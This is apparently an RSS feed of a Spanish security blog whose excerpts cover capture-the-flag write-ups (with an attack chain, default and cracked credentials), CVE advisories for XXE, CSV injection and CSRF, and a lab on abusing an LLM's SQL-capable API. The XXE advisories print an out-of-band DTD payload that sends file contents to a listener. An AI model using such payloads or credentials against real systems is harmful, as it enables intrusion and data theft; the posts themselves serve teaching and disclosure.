<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Web on Hackpuntes</title><link>https://hackpuntes.com/es/categories/web/</link><description>Recent content in Web on Hackpuntes</description><generator>Hugo -- gohugo.io</generator><language>es-es</language><lastBuildDate>Sat, 11 Jul 2026 00:00:00 +0000</lastBuildDate><atom:link href="https://hackpuntes.com/es/categories/web/index.xml" rel="self" type="application/rss+xml"/><item><title>CCTV WriteUp</title><link>https://hackpuntes.com/es/posts/hackthebox/machines/cctv-writeup/</link><pubDate>Sat, 11 Jul 2026 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hackthebox/machines/cctv-writeup/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/hackthebox/machines/cctv/cctv-banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/hackthebox/machines/cctv/cctv-banner.webp" alt="CCTV WriteUp" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;CCTV&lt;/strong&gt; es una máquina de dificultad &lt;code&gt;🟩 Easy&lt;/code&gt; de la plataforma &lt;strong&gt;Hack The Box&lt;/strong&gt;. Combina la explotación de una SQL Injection en &lt;strong&gt;ZoneMinder&lt;/strong&gt; para obtener credenciales de un usuario SSH, con el descubrimiento de servicios internos de video-vigilancia tras pivotar desde la máquina comprometida. La escalada a root se consigue a través de un RCE autenticado en &lt;strong&gt;motionEye&lt;/strong&gt;.&lt;/p&gt;
&lt;h2 id="-cadena-de-ataque"&gt;🗺️ Cadena de Ataque&lt;/h2&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;Nmap → Puerto 80 (ZoneMinder 1.37.63)
│
▼
Credenciales por defecto admin:admin → acceso al panel
│
▼
CVE-2024-51482 (Boolean SQLi) → sqlmap → mark:opensesame
│
▼
SSH como mark
│
▼
LinPEAS → tcpdump (cap_net_raw) + puertos internos
│
▼
Port Forwarding → motionEye 0.43.1b4 en :8765
│
▼
/etc/motioneye/motion.conf → admin:989c5a8ee87a0e9521ec81a79187d162109282f0
│
▼
CVE-2025-60787 (Metasploit RCE) → root 🏴
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id="-reconocimiento"&gt;🔍 Reconocimiento&lt;/h2&gt;
&lt;h3 id="escaneo-de-puertos"&gt;Escaneo de Puertos&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;10.129.15.204 cctv.htb&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; sudo tee -a /etc/hosts
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;sudo nmap -p- --open -Pn --min-rate &lt;span class="m"&gt;5000&lt;/span&gt; -oA ports -vvv cctv.htb
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;grep -oP &lt;span class="s1"&gt;&amp;#39;\d+/open&amp;#39;&lt;/span&gt; ports.gnmap &lt;span class="p"&gt;|&lt;/span&gt; cut -d&lt;span class="s1"&gt;&amp;#39;/&amp;#39;&lt;/span&gt; -f1 &lt;span class="p"&gt;|&lt;/span&gt; sort -u &lt;span class="p"&gt;|&lt;/span&gt; tr &lt;span class="s1"&gt;&amp;#39;\n&amp;#39;&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;,&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; sed &lt;span class="s1"&gt;&amp;#39;s/,$//&amp;#39;&lt;/span&gt; &amp;gt; ports.txt
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;sudo nmap -sCV -p&lt;span class="k"&gt;$(&lt;/span&gt;cat ports.txt&lt;span class="k"&gt;)&lt;/span&gt; -Pn -oA scan -vvv cctv.htb
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Puerto&lt;/th&gt;
&lt;th&gt;Servicio&lt;/th&gt;
&lt;th&gt;Detalle&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;22&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;SSH&lt;/td&gt;
&lt;td&gt;OpenSSH 9.6p1 Ubuntu&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;80&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;HTTP&lt;/td&gt;
&lt;td&gt;Apache 2.4.58 → &lt;code&gt;SecureVision CCTV&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;La superficie de ataque es pequeña. El puerto 22 no es vulnerable, así que nos centramos en el 80.&lt;/p&gt;</description></item><item><title>Fridagate - Herramienta Android para gestionar Frida e interceptar tráfico con Burp Suite</title><link>https://hackpuntes.com/es/posts/fridagate-android-pentesting-tool/</link><pubDate>Wed, 15 Apr 2026 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/fridagate-android-pentesting-tool/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/fridagate-android-pentesting-tool/fridagate-banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/fridagate-android-pentesting-tool/fridagate-banner.webp" alt="Fridagate - Herramienta Android para gestionar Frida e interceptar tráfico con Burp Suite" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Fridagate&lt;/strong&gt; es una aplicación Android open source diseñada para &lt;strong&gt;pentesters de aplicaciones móviles&lt;/strong&gt;. Permite gestionar &lt;strong&gt;frida-server&lt;/strong&gt;, interceptar tráfico HTTPS con &lt;strong&gt;Burp Suite&lt;/strong&gt; e inyectar scripts de bypass directamente desde el dispositivo, sin necesidad de ejecutar comandos manualmente en cada sesión de auditoría.&lt;/p&gt;
&lt;p&gt;El proyecto nació de una necesidad real: durante una auditoría de apps Android el flujo habitual implica conectar por ADB, subir frida-server, darle permisos, arrancarlo, configurar el proxy del sistema, añadir reglas iptables&amp;hellip; Fridagate automatiza todo eso desde una interfaz limpia en el propio teléfono.&lt;/p&gt;</description></item><item><title>PortSwigger Labs - Exploiting LLM APIs with Excessive Agency</title><link>https://hackpuntes.com/es/posts/portswigger/web-security/llm-attacks/lab-exploiting-llm-apis-with-excessive-agency/</link><pubDate>Mon, 09 Mar 2026 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/portswigger/web-security/llm-attacks/lab-exploiting-llm-apis-with-excessive-agency/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/portswigger/web-security/llm-attacks/lab-exploiting-llm-apis-with-excessive-agency/lab-exploiting-llm-apis-with-excessive-agency-banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/portswigger/web-security/llm-attacks/lab-exploiting-llm-apis-with-excessive-agency/lab-exploiting-llm-apis-with-excessive-agency-banner.webp" alt="PortSwigger Labs - Exploiting LLM APIs with Excessive Agency" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Estás auditando una aplicación web que integra un &lt;strong&gt;Large Language Model (LLM)&lt;/strong&gt; como asistente de soporte al cliente. A simple vista parece inofensivo, el usuario pregunta, el modelo responde. Pero debajo de esa interfaz de chat se esconde algo mucho más peligroso, &lt;strong&gt;el LLM tiene acceso&lt;/strong&gt; directo a una API de depuración que ejecuta &lt;strong&gt;comandos SQL arbitrarios&lt;/strong&gt; sobre la base de datos de producción.&lt;/p&gt;</description></item><item><title>TryHackMe - Machine - Pickle Rick v2</title><link>https://hackpuntes.com/es/posts/tryhackme/machines/pickle-rick-writeup/</link><pubDate>Mon, 17 Nov 2025 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/tryhackme/machines/pickle-rick-writeup/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/thm-machine-pickle-rick-v2/thm-machine-pickle-rick-v2_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/thm-machine-pickle-rick-v2/thm-machine-pickle-rick-v2_banner.webp" alt="TryHackMe - Machine - Pickle Rick v2" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;¡Buenas, hackers! 👋&lt;/p&gt;
&lt;p&gt;Hoy, nos sumergimos en la &lt;a href="https://tryhackme.com/room/picklerick" target="_blank" rel="noopener noreferrer"&gt;máquina Pickle Rick&lt;/a&gt;
de TryHackMe. Es un desafío clásico de nivel &lt;strong&gt;🟩 Fácil&lt;/strong&gt;, perfecto para practicar la enumeración web y la escalada de privilegios básica.&lt;/p&gt;
&lt;h2 id="-antes-de-empezar"&gt;🚀 Antes de empezar&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Añadimos&lt;/strong&gt; la máquina al archivo &lt;code&gt;/etc/hosts&lt;/code&gt;, &lt;strong&gt;comprobamos la conexión&lt;/strong&gt; con &lt;code&gt;ping&lt;/code&gt; y &lt;strong&gt;creamos las carpetas de trabajo&lt;/strong&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;10.10.34.26\tpicklerick.thm&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; sudo tee -a /etc/hosts
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;ping -c &lt;span class="m"&gt;1&lt;/span&gt; picklerick.thm
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mkdir -p ~/thm/picklerick/&lt;span class="o"&gt;{&lt;/span&gt;exploits,fuzz,http,nmap&lt;span class="o"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;cd&lt;/span&gt; ~/thm/picklerick/
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="-reconocimiento"&gt;🔎 Reconocimiento&lt;/h2&gt;
&lt;h3 id="escaneo-de-puertos-con-nmap"&gt;Escaneo de puertos con Nmap&lt;/h3&gt;
&lt;p&gt;Comprobamos &lt;strong&gt;todos los puertos&lt;/strong&gt; que están &lt;strong&gt;abiertos&lt;/strong&gt;, detectamos el servicio y su versión con &lt;code&gt;nmap&lt;/code&gt; y generamos &lt;code&gt;all.html&lt;/code&gt; para ver la información.&lt;/p&gt;</description></item><item><title>HTB Machine BountyHunter</title><link>https://hackpuntes.com/es/posts/hackthebox/machines/bountyhunter-writeup/</link><pubDate>Sat, 20 Nov 2021 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hackthebox/machines/bountyhunter-writeup/</guid><description>&lt;p&gt;&lt;a href="images/htb-machine-bountyhunter/htb-machine-bountyhunter_banner.png"&gt;&lt;img src="images/htb-machine-bountyhunter/htb-machine-bountyhunter_banner.png" alt="Hack The Box - Machine - BountyHunter" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h1 id="descripción-general"&gt;Descripción general&lt;/h1&gt;
&lt;p&gt;Bienvenido al writeup de la máquina &lt;strong&gt;bountyhunter&lt;/strong&gt; de la plataforma Hack The Box. BountyHunter es una máquina Linux que estuvo activa desde el 24 de julio hasta el 20 de noviembre. En esta máquina encontraremos una vulnerabilidad XXE que usaremos junto con un wrapper PHP para leer ficheros internos y obtener información sensible. Con la información obtenida nos conectaremos por SSH y una vez dentro analizaremos un script Python para descubrir cómo abusarlo y conseguir ejecución de código como root.&lt;/p&gt;</description></item><item><title>reNgine – Framework de reconocimiento automatizado para aplicaciones web</title><link>https://hackpuntes.com/es/posts/rengine-framework-de-reconocimiento-automatizado-para-aplicaciones-web/</link><pubDate>Mon, 19 Oct 2020 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/rengine-framework-de-reconocimiento-automatizado-para-aplicaciones-web/</guid><description>&lt;h2 id="1-sobre-rengine"&gt;1. Sobre reNgine&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/rengine-framework-de-reconocimiento-automatizado-para-aplicaciones-web/rengine-framework-de-reconocimiento-automatizado-para-aplicaciones-web_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/rengine-framework-de-reconocimiento-automatizado-para-aplicaciones-web/rengine-framework-de-reconocimiento-automatizado-para-aplicaciones-web_001.webp" alt="reNgine – Framework de reconocimiento automatizado para aplicaciones web" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Dashboard de la aplicación reNgine&lt;/p&gt;
&lt;p&gt;reNgine es un &lt;strong&gt;framework de reconocimineto automatizado para aplicaciones web&lt;/strong&gt; utilizado para realizar la fase de recopilación de información durante las auditorías, cuenta con varios motores de escaneo personalizables que pueden ayudarnos para:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Escanear puertos en los servidores de aplicaciones.&lt;/li&gt;
&lt;li&gt;Enumerar subdominios.&lt;/li&gt;
&lt;li&gt;Buscar directorios y archivos.&lt;/li&gt;
&lt;li&gt;Encontrar endpoints.&lt;/li&gt;
&lt;li&gt;Tomar capturas de pantalla.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/rengine-framework-de-reconocimiento-automatizado-para-aplicaciones-web/rengine-framework-de-reconocimiento-automatizado-para-aplicaciones-web_002.webp"&gt;&lt;img src="https://hackpuntes.com/images/rengine-framework-de-reconocimiento-automatizado-para-aplicaciones-web/rengine-framework-de-reconocimiento-automatizado-para-aplicaciones-web_002.webp" alt="reNgine – Framework de reconocimiento automatizado para aplicaciones web" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Enviar tráfico de Burp Suite a través de VPS</title><link>https://hackpuntes.com/es/posts/enviar-trafico-de-burp-suite-a-traves-de-vps/</link><pubDate>Mon, 13 Apr 2020 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/enviar-trafico-de-burp-suite-a-traves-de-vps/</guid><description>&lt;p&gt;Cuando estamos auditando una aplicación externa con Burp Suite, podemos encontrarnos en un entorno con restricciones de red, por ejemplo, un firewall podría interferir en nuestros paquetes y descartarlos o modificarlos, lo que daría como resultado falsos positivos o la anulación de ciertas pruebas de seguridad.&lt;/p&gt;
&lt;p&gt;En esta entrada, veremos como &lt;strong&gt;enviar el tráfico del proxy de Burp Suite a través de una máquina linux en la nube (VPS)&lt;/strong&gt; para evitar estos problemas u otros similares.&lt;/p&gt;</description></item><item><title>Añadir CA de Burp Suite al almacén de certificados de Kali Linux</title><link>https://hackpuntes.com/es/posts/anadir-ca-de-burp-suite-al-almacen-de-certificados-de-kali-linux/</link><pubDate>Sun, 29 Mar 2020 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/anadir-ca-de-burp-suite-al-almacen-de-certificados-de-kali-linux/</guid><description>&lt;p&gt;Durante un programa privado de bug bounty, estuve utilizando las herramientas cURL, gobuster y sqlmap a través del proxy de Burp Suite. Como siempre y por vagancia, configuraba las herramientas para que ignoraran el certificado de PortSwigger (por ejemplo, la opción &lt;code&gt;-k&lt;/code&gt; en cURL).&lt;/p&gt;
&lt;p&gt;En caso de no añadir opciones de ignorar certificados a nuestras herramientas, podemos obtener errores del tipo &lt;strong&gt;SSL certificate problem&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/anadir-ca-de-burp-suite-al-almacen-de-certificados-de-kali-linux/anadir-ca-de-burp-suite-al-almacen-de-certificados-de-kali-linux_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/anadir-ca-de-burp-suite-al-almacen-de-certificados-de-kali-linux/anadir-ca-de-burp-suite-al-almacen-de-certificados-de-kali-linux_001.webp" alt="Añadir CA de Burp Suite al almacén de certificados de Kali Linux" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Cabeceras de seguridad HTTP</title><link>https://hackpuntes.com/es/posts/cabeceras-de-seguridad-http/</link><pubDate>Wed, 11 Dec 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cabeceras-de-seguridad-http/</guid><description>&lt;p&gt;Las &lt;strong&gt;Cabeceras HTTP&lt;/strong&gt; son parámetros que se envían en una petición o respuesta HTTP entre el cliente y el servidor para proporcionar información esencial sobre la transacción que se esté llevando a cabo. Estas cabeceras siempre utilizan la sintaxis &lt;strong&gt;«Cabecera: Valor»&lt;/strong&gt; y a continuación veremos cuales son las &lt;strong&gt;cabeceras de respuesta&lt;/strong&gt; más importantes enfocándonos en la seguridad.&lt;/p&gt;
&lt;h2 id="http-strict-transport-security-hsts"&gt;HTTP Strict Transport Security (HSTS)&lt;/h2&gt;
&lt;p&gt;Esta cabecera permite indicar a un navegador que &lt;strong&gt;siempre&lt;/strong&gt; se utilice el protocolo HTTPS para establecer la comunicación entre el cliente y servidor (en lugar de HTTP). Esto significa que cualquier marcador, enlace, recurso o dirección forzará a los usuarios a hacer uso de HTTPS, inclusive si el propio usuario especifica el uso de HTTP.&lt;/p&gt;</description></item><item><title>CVE-2019-19032 XMLBlueprint &lt;= 16.191112 - Inyección XML (XXE)</title><link>https://hackpuntes.com/es/posts/cve-2019-19032-xmlblueprint-16-191112-inyeccion-xml/</link><pubDate>Mon, 25 Nov 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2019-19032-xmlblueprint-16-191112-inyeccion-xml/</guid><description>&lt;h2 id="resumen"&gt;Resumen&lt;/h2&gt;
&lt;p&gt;Se ha detectado una vulnerabilidad de &lt;strong&gt;&lt;a href="https://www.owasp.org/index.php/XML_External_Entity_%5c%28XXE%5c%29_Processing" target="_blank" rel="noopener noreferrer"&gt;inyección XML&lt;/a&gt;
&lt;/strong&gt; (XXE) basada en entidades externas (DTD) en el software &lt;a href="https://www.xmlblueprint.com/documents/xmlblueprint-16.191112.exe" target="_blank" rel="noopener noreferrer"&gt;&lt;strong&gt;XMLBlueprint versión 16.191112&lt;/strong&gt;&lt;/a&gt;
 y posiblemente anteriores. Esta vulnerabilidad está asociada al &lt;strong&gt;&lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19032" target="_blank" rel="noopener noreferrer"&gt;CVE-2019-19032&lt;/a&gt;
&lt;/strong&gt;.&lt;/p&gt;
&lt;h2 id="impacto"&gt;Impacto&lt;/h2&gt;
&lt;p&gt;Un usuario malintencionado, podría generar un archivo XML malicioso con la intención de causar una &lt;strong&gt;denegación de servicio a la aplicación o leer archivos arbitrarios&lt;/strong&gt; del sistema.&lt;/p&gt;
&lt;h2 id="prueba-de-concepto"&gt;Prueba de concepto&lt;/h2&gt;
&lt;div style="position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;"&gt;
&lt;iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen" loading="eager" referrerpolicy="strict-origin-when-cross-origin" src="https://www.youtube.com/embed/N6cpCPwm8ys?autoplay=0&amp;amp;controls=1&amp;amp;end=0&amp;amp;loop=0&amp;amp;mute=0&amp;amp;start=0" style="position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;" title="YouTube video"&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;ol&gt;
&lt;li&gt;Iniciar un servidor web.&lt;/li&gt;
&lt;/ol&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;python -m SimpleHTTPServer 80
&lt;/code&gt;&lt;/pre&gt;&lt;ol start="2"&gt;
&lt;li&gt;Subir el siguiente archivo &lt;strong&gt;payload.dtd&lt;/strong&gt; al servidor.&lt;/li&gt;
&lt;/ol&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;&amp;lt;?xml version=&amp;#34;1.0&amp;#34; encoding=&amp;#34;UTF-8&amp;#34;?&amp;gt;
&amp;lt;!ENTITY % all &amp;#34;&amp;lt;!ENTITY send SYSTEM &amp;#39;http://localhost:80/?%file;&amp;#39;&amp;gt;&amp;#34;&amp;gt;
%all;
&lt;/code&gt;&lt;/pre&gt;&lt;ol start="3"&gt;
&lt;li&gt;
&lt;p&gt;Crear un archivo de texto &lt;strong&gt;(secret.txt)&lt;/strong&gt; en el escritorio con cualquier contenido.&lt;/p&gt;</description></item><item><title>CVE-2019-19031 Easy XML Editor &lt;= 1.7.8 - Inyección XML</title><link>https://hackpuntes.com/es/posts/cve-2019-19031-easy-xml-editor-1-7-8-inyeccion-xml/</link><pubDate>Fri, 22 Nov 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2019-19031-easy-xml-editor-1-7-8-inyeccion-xml/</guid><description>&lt;h2 id="resumen"&gt;Resumen&lt;/h2&gt;
&lt;p&gt;Se ha detectado una vulnerabilidad de &lt;strong&gt;&lt;a href="https://www.owasp.org/index.php/XML_External_Entity_%5c%28XXE%5c%29_Processing" target="_blank" rel="noopener noreferrer"&gt;inyección XML&lt;/a&gt;
&lt;/strong&gt; basada en entidades externas (DTD) en el software &lt;strong&gt;&lt;a href="https://www.edit-xml.com/Easy_XML_Editor.exe" target="_blank" rel="noopener noreferrer"&gt;Easy XML Editor versión 1.7.8&lt;/a&gt;
&lt;/strong&gt; y posiblemente anteriores. Esta vulnerabilidad está asociada al &lt;strong&gt;&lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19031" target="_blank" rel="noopener noreferrer"&gt;CVE-2019-19031&lt;/a&gt;
&lt;/strong&gt;.&lt;/p&gt;
&lt;h2 id="impacto"&gt;Impacto&lt;/h2&gt;
&lt;p&gt;Un usuario malintencionado, podría generar un archivo XML malicioso con la intención de causar una &lt;strong&gt;denegación de servicio a la aplicación o leer archivos arbitrarios&lt;/strong&gt; del sistema.&lt;/p&gt;
&lt;h2 id="prueba-de-concepto"&gt;Prueba de concepto&lt;/h2&gt;
&lt;div style="position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;"&gt;
&lt;iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen" loading="eager" referrerpolicy="strict-origin-when-cross-origin" src="https://www.youtube.com/embed/DXssm4Ll-EE?autoplay=0&amp;amp;controls=1&amp;amp;end=0&amp;amp;loop=0&amp;amp;mute=0&amp;amp;start=0" style="position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;" title="YouTube video"&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;ol&gt;
&lt;li&gt;Iniciar un servidor web.&lt;/li&gt;
&lt;/ol&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;python -m SimpleHTTPServer 80
&lt;/code&gt;&lt;/pre&gt;&lt;ol start="2"&gt;
&lt;li&gt;Subir el siguiente archivo &lt;strong&gt;payload.dtd&lt;/strong&gt; al servidor.&lt;/li&gt;
&lt;/ol&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;&amp;lt;?xml version=&amp;#34;1.0&amp;#34; encoding=&amp;#34;UTF-8&amp;#34;?&amp;gt;
&amp;lt;!ENTITY % all &amp;#34;&amp;lt;!ENTITY send SYSTEM &amp;#39;http://localhost:80/?%file;&amp;#39;&amp;gt;&amp;#34;&amp;gt;
%all;
&lt;/code&gt;&lt;/pre&gt;&lt;ol start="3"&gt;
&lt;li&gt;
&lt;p&gt;Crear un archivo de texto &lt;strong&gt;(secret.txt)&lt;/strong&gt; en el escritorio con cualquier contenido.&lt;/p&gt;</description></item><item><title>CVE-2019-15092 WordPress Plugin Import Export Users = 1.3.0 - CSV Injection</title><link>https://hackpuntes.com/es/posts/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/</link><pubDate>Thu, 22 Aug 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection_banner.webp" alt="CVE-2019-15092 WordPress Plugin Import Export Users = 1.3.0 - CSV Injection" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="impacto"&gt;Impacto&lt;/h2&gt;
&lt;p&gt;Un usuario malicioso con &lt;strong&gt;permisos básicos&lt;/strong&gt; de WordPress (suscriptor) podría &lt;strong&gt;ejecutar comandos&lt;/strong&gt; en el equipo del administrador a través de &lt;strong&gt;inyecciones CSV&lt;/strong&gt; en los campos &lt;code&gt;display_name&lt;/code&gt;, &lt;code&gt;first_name&lt;/code&gt; y &lt;code&gt;last_name&lt;/code&gt;.&lt;/p&gt;
&lt;h2 id="cvss-v31-vector"&gt;CVSS v3.1 Vector&lt;/h2&gt;
&lt;p&gt;AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H&lt;/p&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection_001.webp" alt="CVE-2019-15092 WordPress Plugin Import Export Users = 1.3.0 - CSV Injection" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection_002.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection_002.webp" alt="CVE-2019-15092 WordPress Plugin Import Export Users = 1.3.0 - CSV Injection" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>CVE-2019-14346 Adive Framework 2.0.7 - Cross-Site Request Forgery</title><link>https://hackpuntes.com/es/posts/cve-2019-14346-adive-framework-2-0-7-cross-site-request-forgery/</link><pubDate>Fri, 02 Aug 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2019-14346-adive-framework-2-0-7-cross-site-request-forgery/</guid><description>&lt;p&gt;Las vulnerabilidades &lt;a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%5c%28CSRF%5c%29" target="_blank" rel="noopener noreferrer"&gt;Cross-Site Request Forgery (CSRF)&lt;/a&gt;
 encontradas en Adive Framework 2.0.7 &lt;strong&gt;permiten a un usuario malintencionado realizar acciones como cambiar la contraseña de un usuario&lt;/strong&gt; a través de este ataque. La vulnerabilidad, ha sido asociada al &lt;strong&gt;CVE-2019-14346&lt;/strong&gt;.&lt;/p&gt;
&lt;h2 id="cve-2019-14346"&gt;CVE-2019-14346&lt;/h2&gt;
&lt;h3 id="adive-framework-207--cross-site-request-forgery"&gt;Adive Framework 2.0.7 – Cross-Site Request Forgery&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2019-14346-adive-framework-2-0-7-cross-site-request-forgery/cve-2019-14346-adive-framework-2-0-7-cross-site-request-forgery_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2019-14346-adive-framework-2-0-7-cross-site-request-forgery/cve-2019-14346-adive-framework-2-0-7-cross-site-request-forgery_001.webp" alt="CVE-2019-14346 Adive Framework 2.0.7 - Cross-Site Request Forgery" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="https://adive.es/" target="_blank" rel="noopener noreferrer"&gt;www.adive.es&lt;/a&gt;
&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;📅 Vulnerabilidad descubierta por Pablo Santiago el &lt;strong&gt;02/08/2019&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;🐛 &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14346" target="_blank" rel="noopener noreferrer"&gt;CVE-2019-14346&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;🔗 Link del software &lt;a href="https://www.adive.es/" target="_blank" rel="noopener noreferrer"&gt;web&lt;/a&gt;
 y del &lt;a href="https://github.com/ferdinandmartin/adive-php7" target="_blank" rel="noopener noreferrer"&gt;github&lt;/a&gt;
 con el proyecto.&lt;/li&gt;
&lt;li&gt;🐞 Versión vulnerable = &lt;strong&gt;2.0.7&lt;/strong&gt; y anteriores probablemente.&lt;/li&gt;
&lt;/ul&gt;
